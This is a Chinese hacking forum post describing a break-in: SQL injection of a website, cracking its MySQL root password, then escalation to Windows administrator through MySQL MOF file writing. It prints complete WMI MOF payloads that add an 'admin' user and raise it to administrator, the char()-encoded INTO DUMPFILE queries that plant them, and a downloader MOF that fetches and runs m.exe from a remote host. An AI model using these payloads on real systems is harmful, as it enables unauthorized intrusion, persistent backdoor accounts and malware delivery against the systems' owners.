无shell情况下的mysql远程mof提权利用方法详解

渗透小能手

扫到一个站的注入

在havij中得到mysql数据库中mysql库保存的数据库密码：

有时候发现1.15版的还是最好用，最稳定，虽然速度慢了一点。
照样放到坛子里让机油破了

感谢Mr.Lu。顺便吐槽下，cmd5连个root都要收费。。。
在等着密码破解出来的时候顺便nmap了一下

意外发现端口改到了1126，给后面省下了不少时间。
照常外连试试

上个帖子里面有基友问这个软件是什么，我用的是navicat，感觉很好用的
现在的常规思路就是得到绝对路径，写一个小马，再进一步渗透。
但是网站上面暴不出路径，看看mysql的路径
用select @@basedir;命令可以看到；

网站的路径大概差不多了，懒得一个一个试了，最近mof提权挺火的，上次失败了一次，这次再来试试好了。
mof文件内容为：

1. #pragma namespace("\\\\.\\root\\subscription")
   
2. instance of __EventFilter as $EventFilter
   
3. {
   
4.     EventNamespace = "Root\\Cimv2";
   
5.     Name  = "filtP2";
   
6.     Query = "Select * From __InstanceModificationEvent "
   
7.             "Where TargetInstance Isa "Win32_LocalTime" "
   
8.             "And TargetInstance.Second = 5";
   
9.     QueryLanguage = "WQL";
   
10. };
    
11. instance of ActiveScriptEventConsumer as $Consumer
    
12. {
    
13.     Name = "consPCSV2";
    
14.     ScriptingEngine = "JScript";
    
15.     ScriptText =
    
16.     "var WSH = new ActiveXObject("WScript.Shell")\nWSH.run("net.exe user admin admin /add")";
    
17. };
    
18. instance of __FilterToConsumerBinding
    
19. {
    
20.     Consumer   = $Consumer;
    
21.     Filter = $EventFilter;
    
22. };

复制代码

于没有马，不能按照网盘里面说的先传一个mof上去，我就直接一次性写入。
先是试了试直接将原来的语句写入，提示失败，原因就是语句里面很多“；回车”之类的符号。
然后就想转化为16进制或者asc码这样。
先试了16进制。
等了老半天什么还是登陆不上去，就放弃了，改用asc码，用的sql语句为：

1. select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';

复制代码

效果就是添加一个用户admin密码admin；
等了有5秒，登陆框的提示从
<ignore_js_op>
变成了

这时候才意识到一个问题，上面的语句只添加了用户，忘了提升为管理员了。。。
好吧，重新写一遍mof

1. select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';

复制代码

好了，这样就顺利登进去了；


改天研究一下一次性完成添加管理员试试

现在默认它还是会过5s添加一次用户，解决方法就是:
第一 net stop winmgmt 停止服务，
第二 删除文件夹：C:\WINDOWS\system32\wbem\Repository\
第三 net start winmgmt 启动服务
还有其他方法在网盘的文件里面有写。


PS:
03以上必须要手动编译mof，用api或mofcomp

1. %windir%\system32\wbem\mofcomp -N:root\subscription mof.mof

复制代码

命令行下，mofcomp.exe -N:root\cimv2 X.mof，如果你有权限的话。 或是写程序执行wmi。

MOF提权下载者代码：

1. #pragma namespace("\\\\.\\root\\subscription")
   
2. 
   
3. instance of __EventFilter as $EventFilter
   
4. {
   
5.     EventNamespace = "Root\\Cimv2";
   
6.     Name  = "filtP2";
   
7.     Query = "Select * From __InstanceModificationEvent "
   
8.             "Where TargetInstance Isa "Win32_LocalTime" "
   
9.             "And TargetInstance.Second = 5";
   
10.     QueryLanguage = "WQL";
    
11. };
    
12. 
    
13. instance of ActiveScriptEventConsumer as $Consumer
    
14. {
    
15. Name = "consPCSV2";
    
16. ScriptingEngine = "VBScript";
    
17. ScriptText ="Set Post = CreateObject("Msxml2.XMLHTTP")\nSet Shell = CreateObject("Wscript.Shell")\nPost.Open "GET","http://192.168.85.130/m.exe",0\nPost.Send()\nSet aGet = CreateObject("ADODB.Stream")\naGet.Mode = 3\naGet.Type = 1\naGet.Open()\naGet.Write(Post.responseBody)\naGet.SaveToFile "C:\\WINDOWS\\Temp\\ftp.exe",2\nShell.Run ("C:\\WINDOWS\\Temp\\ftp.exe")";
    
18. };
    
19. 
    
20. instance of __FilterToConsumerBinding
    
21. {
    
22.     Consumer   = $Consumer;
    
23.     Filter = $EventFilter;
    
24. };

复制代码

愛李的人

这是原创还是转载哦！
http://www.cnblogs.com/cnsanshao/p/5546872.html